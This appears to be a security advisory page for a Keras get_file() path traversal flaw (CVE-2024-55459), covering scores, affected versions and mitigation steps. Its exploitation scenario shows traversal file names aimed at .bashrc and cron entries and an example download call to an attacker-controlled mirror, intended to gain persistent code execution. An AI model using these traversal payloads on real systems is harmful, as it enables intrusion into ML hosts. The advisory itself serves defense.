CVE-2024-55459: Keras: path traversal enables arbitrary file write

GHSA-cjgq-5qmw-rcj6 MEDIUM PoC AVAILABLE CISA: TRACK*
Published January 8, 2025
CISO Take

Any ML pipeline using Keras's get_file() to download external archives is vulnerable to arbitrary file writes on the host system via a crafted tar file. No official patch exists — immediately audit all get_file() calls, restrict downloads to integrity-verified sources, and isolate training environments. Teams using Keras ≤3.7.0 in automated MLOps pipelines should treat this as an active supply chain risk to training infrastructure.

What is the risk?

Medium severity in isolation, but elevated in AI/ML contexts where automated pipelines routinely download datasets and model weights from external sources without manual review. Exploitation is low complexity once a malicious archive is staged (classic tar-slip), but requires user or pipeline execution pointing to attacker-controlled URLs. No active exploitation observed (EPSS 0.00149), not in CISA KEV. Risk concentrates in developer workstations and CI/CD training pipelines; production inference endpoints are typically not affected unless they dynamically download artifacts.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Keras pip No patch
64.1K OpenSSF 7.1 1.6K dependents Pushed 5d ago 48% patched ~32d to patch Full package profile →
Keras pip <= 3.7.0 No patch
64.1K OpenSSF 7.1 1.6K dependents Pushed 5d ago 48% patched ~32d to patch Full package profile →

How severe is it?

CVSS 3.1
6.5 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 12% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Unchanged
C None
I High
A None

What should I do?

6 steps
  1. PATCH

    No official fix available — monitor https://github.com/keras-team/keras for a release. Pin to a version prior to 3.7.0 if regression testing confirms it is unaffected, or fork with manual path sanitization.

  2. WORKAROUND

    Replace get_file() calls with custom download logic that validates extracted paths and rejects any entry containing '../' or absolute paths before extraction.

  3. HARDEN

    Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions.

  4. VERIFY

    Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash.

  5. DETECT

    Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools).

  6. AUDIT

    Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.3 - AI supply chain
NIST AI RMF
MANAGE 2.2 - Mechanisms to investigate and address AI risks are in place
OWASP LLM Top 10
LLM03:2025 - Supply Chain

Frequently Asked Questions

What is CVE-2024-55459?

Any ML pipeline using Keras's get_file() to download external archives is vulnerable to arbitrary file writes on the host system via a crafted tar file. No official patch exists — immediately audit all get_file() calls, restrict downloads to integrity-verified sources, and isolate training environments. Teams using Keras ≤3.7.0 in automated MLOps pipelines should treat this as an active supply chain risk to training infrastructure.

Is CVE-2024-55459 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-55459, increasing the risk of exploitation.

How to fix CVE-2024-55459?

1. PATCH: No official fix available — monitor https://github.com/keras-team/keras for a release. Pin to a version prior to 3.7.0 if regression testing confirms it is unaffected, or fork with manual path sanitization. 2. WORKAROUND: Replace get_file() calls with custom download logic that validates extracted paths and rejects any entry containing '../' or absolute paths before extraction. 3. HARDEN: Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions. 4. VERIFY: Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash. 5. DETECT: Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools). 6. AUDIT: Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.

What systems are affected by CVE-2024-55459?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, MLOps CI/CD pipelines, developer workstations.

What is the CVSS score for CVE-2024-55459?

CVE-2024-55459 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.22%.

What is the AI security impact?

Affected AI Architectures

training pipelinesdata preprocessing pipelinesMLOps CI/CD pipelinesdeveloper workstations

MITRE ATLAS Techniques

AML.T0002.000 Datasets
AML.T0010.001 AI Software
AML.T0011 User Execution
AML.T0018.002 Embed Malware

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function.

Exploitation Scenario

An adversary crafts a malicious tar.gz archive where filenames embed path traversal sequences (e.g., ../../home/mluser/.bashrc or ../../../../etc/cron.d/gpu-job). The archive is hosted on an attacker-controlled server or injected into a compromised public dataset mirror. A data scientist or automated MLOps pipeline calls keras.utils.get_file(url='https://attacker-controlled-mirror.com/imagenet-subset.tar.gz', extract=True). Keras downloads and extracts the archive without sanitizing entry paths, silently writing attacker-controlled content to arbitrary filesystem locations. Depending on permissions, this overwrites Python startup scripts, authorized_keys, or cron entries — achieving persistent code execution on the ML training host with no further user interaction.

Weaknesses (CWE)

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Timeline

Published
January 8, 2025
Last Modified
September 22, 2025
First Seen
January 8, 2025

Related Vulnerabilities